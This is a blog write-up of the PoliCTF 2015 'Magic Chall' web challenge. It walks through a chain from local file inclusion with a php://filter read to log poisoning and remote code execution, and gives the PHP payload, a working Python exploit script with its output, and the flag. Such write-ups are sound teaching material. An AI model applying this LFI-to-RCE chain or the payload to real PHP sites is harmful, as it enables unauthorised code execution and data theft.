หน้าเว็บ

วันอาทิตย์ที่ 12 กรกฎาคม พ.ศ. 2558

PoliCTF 2015: Magic Chall (Web) Write-up


Description:
I visit this website when I'm sad, contains many magical things that help me to find the solution. Focused on  your problem and find "the magic thing" that will help you to solve it.
Solution:

1. Go to http://magic.polictf.it/index.php?page=register, and I try Local File Inclusion in "page" parameter with base64 encode php filter.
Ex. http://magic.polictf.it/index.php?page=php://filter/convert.base64-encode/resource=index, and read all php file.



2. /index.php file. 
if(isset($_POST["login"])){
 if(isset($_POST["username"]) && isset($_POST["password"]) && !is_array($_POST["username"]) && !is_array($_POST["password"])){
  $user = new User($_POST["username"], $_POST["password"]);
  $login = $user -> login();
  if($login){
   $logger = new Logger(gethostbyaddr($_SERVER["REMOTE_ADDR"]), $user);
   $logger -> log_access();
   header("Location: magic_things.php");
  }
 }
}
gethostbyaddr function *0*, I go to http://ipinfo.io/ and get my hostname. :)

3. /classes/logger/logger.php, in __construct I see...
 public function __construct($host, $user){
  $this -> host = $host;
  $this -> filename = $_SERVER["DOCUMENT_ROOT"]."log/" . $host . "_" . $user->getSurname();
  $this -> user = $user;
  date_default_timezone_set("UTC");
 } 
log_access() function and initLogFile() function have fwrite to write log file. It mean in /log folder have a log file name will concat my hostname and underscore and surname (in register)
Ex. http://magic.polictf.it/log/ppp-127.0.0.1.revip8.asianet.co.th_surname

I can write file :D

4. back to index.php
  <div id="content">
   <?php 
    include($page.".php");
   ?>
  </div>
include function can be execute php code!!
in "surname" field I set to name.php.

5. In "name" and "surname" field I can set to php code. Ex. <?php phpinfo(); ?>, and I select to set php code in "name" field.
 public function log_access(){
  $active = $this -> user -> isActive();
  if(!$active){
   $this -> initLogFile();
  }
  $fo = fopen($this -> filename, 'a');
  if($fo){
   $write = fwrite($fo, date('l jS \of F Y h:i:s A') . " - " . $this -> user -> getUsername() .": log in success\n");
   fclose($fo);
   if($write)
    return true;
   else
    return false;
  }
 }
 
 public function initLogFile(){
  $fo = fopen($this -> filename, 'w+');
  if($fo){
   $write = fwrite($fo, "name|".$this -> user -> getName().";surname|".$this->user->getSurname().";date_creation|UTC:".date('l jS \of F Y h:i:s A')."\n");//write header in logfile.
   fclose($fo);
   if($write){
    $this -> user -> setActiveBit(1);
    return true;
   }
   else
    return false;
  }
 }
6. In /classes/magic/magic.php, I just LFI to Remote code execution to call __call function.
 public function __call($iveNeverSeenAnythingSoMagical, $magicArguments) {
  $mysqli = new mysqli("localhost", "magic", "nrqdUz4PMKNFZ7iphnzE", "magicchall");
  $stmt = $mysqli->prepare("SELECT word FROM magic_word");
  $stmt -> execute();
  $stmt -> store_result();
  $stmt -> bind_result($magic_word);
  $stmt -> fetch();
  echo "I THINK THIS IS THE VERY MAGIC THING: " . $magic_word;
  session_destroy();
 }

Exploitation:

Step 1: Register - http://magic.polictf.it/index.php?page=register

Name: <?php $magic = new Magic(); $magic->__call(); ?>
Surname: icheernoom.php
User: icheernoom
Password: icheernoom

Step 2: Login - http://magic.polictf.it/index.php?page=login

User: icheernoom
Password: icheernoom

Step 3: Access to http://magic.polictf.it/index.php?page=log/ppp-127.0.0.1.revip8.asianet.co.th_icheernoom

Get a flag!
  <div id="content">
   name|I THINK THIS IS THE VERY MAGIC THING: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()};surname|icheernoom.php;date_creation|UTC:Saturday 11th of July 2015 06:52:15 PM
Saturday 11th of July 2015 06:52:15 PM - icheernoom: log in success
  </div>
My Automate Script:

#!/usr/bin/python
# Author: Kitwipat Towattana (@icheernoom)
import urllib, urllib2, re, sys, socket, random
if len(sys.argv) < 2:
print "Usage: {0} {1}".format(sys.argv[0], "\"<?php phpinfo(); >\"")
sys.exit()
host = socket.gethostbyaddr("127.0.0.1")[0] #change to your ip
url_register = 'http://magic.polictf.it/index.php?page=register'
url_login = 'http://magic.polictf.it/index.php?page=login'
url_log = 'http://magic.polictf.it/index.php?page=log/{0}'.format(host)
random = str(random.randint(100,10000))
name = sys.argv[1]
surname = "{0}.php".format(random)
username = random
password = random
def register(name, surname, username, password):
post_data = urllib.urlencode({'name' : name, 'surname' : surname, 'username' : username, 'password' : password, 'register' : 'send'})
req = urllib2.Request(url_register, post_data)
resp = urllib2.urlopen(req).read()
def login(username, password):
post_data = urllib.urlencode({'username' : username, 'password' : password, 'login' : 'login'})
req = urllib2.Request(url_login, post_data)
resp = urllib2.urlopen(req).read()
def exploit(url_log, surname):
log_path = "{0}_{1}".format(url_log, surname.replace(".php",""))
req = urllib2.Request(log_path)
resp = urllib2.urlopen(req).read()
return resp
print "[*] Register with username: {0}".format(username)
register(name, surname, username, password)
print "[*] Login"
login(username, password)
print "[*] Exploit"
content = exploit(url_log, surname)
result = re.search('name\|(.*)\;surname', content, re.DOTALL)
print "[*] Result: \n",result.group(1)
'''
root@ubuntu:~# python web350.py "<?php $magic = new Magic(); $magic->__call(); ?>"
[*] Register with username: 1337
[*] Login
[*] Exploit
[*] Result:
I THINK THIS IS THE VERY MAGIC THING: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()}
'''
view raw web350.py hosted with ❤ by GitHub

Explorer:



and more...

Flag: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()}

ไม่มีความคิดเห็น:

แสดงความคิดเห็น